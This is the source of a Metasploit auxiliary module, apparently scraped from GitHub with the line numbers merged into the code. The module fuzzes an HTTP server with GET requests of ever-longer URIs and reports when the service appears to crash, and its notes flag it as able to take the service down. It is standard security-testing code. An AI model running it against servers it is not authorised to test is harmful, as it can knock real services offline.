Path: blob/master/modules/auxiliary/fuzzers/http/http_get_uri_long.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'English'6class MetasploitModule < Msf::Auxiliary7include Msf::Exploit::Remote::Tcp8include Msf::Auxiliary::Fuzzer910def initialize(info = {})11super(12update_info(13info,14'Name' => 'HTTP GET Request URI Fuzzer (Incrementing Lengths)',15'Description' => %q{16This module sends a series of HTTP GET request with incrementing URL lengths.17},18'Author' => [ 'nullthreat' ],19'License' => MSF_LICENSE,20'Notes' => {21'Stability' => [CRASH_SERVICE_DOWN],22'SideEffects' => [],23'Reliability' => []24}25)26)27register_options([28Opt::RPORT(80),29OptInt.new('MAXLENGTH', [true, 'The longest string length to try', 16384]),30OptString.new('URIBASE', [true, 'The base URL to use for the request fuzzer', '/']),31OptString.new('VHOST', [false, 'The virtual host name to use in requests'])32])33end3435def do_http_get(uri = '', opts = {})36@connected = false37connect38@connected = true3940sock.put("GET #{uri} HTTP/1.1\r\nHost: #{datastore['VHOST'] || rhost}\r\n\r\n")41sock.get_once(-1, opts[:timeout] || 0.01)42end4344def run45last_str = nil46last_inp = nil47last_err = nil4849pre = make_http_uri_base50cnt = 051521.upto(datastore['MAXLENGTH'].to_i) do |len|53cnt += 15455str = fuzzer_gen_string(len)5657# XXX: Encode the string or leave it raw? Best to make a new boolean option to enable/disable this58uri = pre + str5960if (cnt % 100 == 0)61print_status("Fuzzing with iteration #{cnt} using string length #{len}")62end6364begin65do_http_get(uri, timeout: 0.25)66rescue ::Interrupt67print_status("Exiting on interrupt: iteration #{cnt} using string length #{len}")68raise $ERROR_INFO69rescue StandardError => e70last_err = e71ensure72disconnect73end7475if !@connected76if last_str77print_status("The service may have crashed: iteration:#{cnt - 1} len=#{len} uri=''#{last_str}'' error=#{last_err}")78else79print_status("Could not connect to the service: #{last_err}")80end81break82end8384last_str = str85last_inp = @last_fuzzer_input86end87end8889def make_http_uri_base90datastore['URIBASE']91end92end939495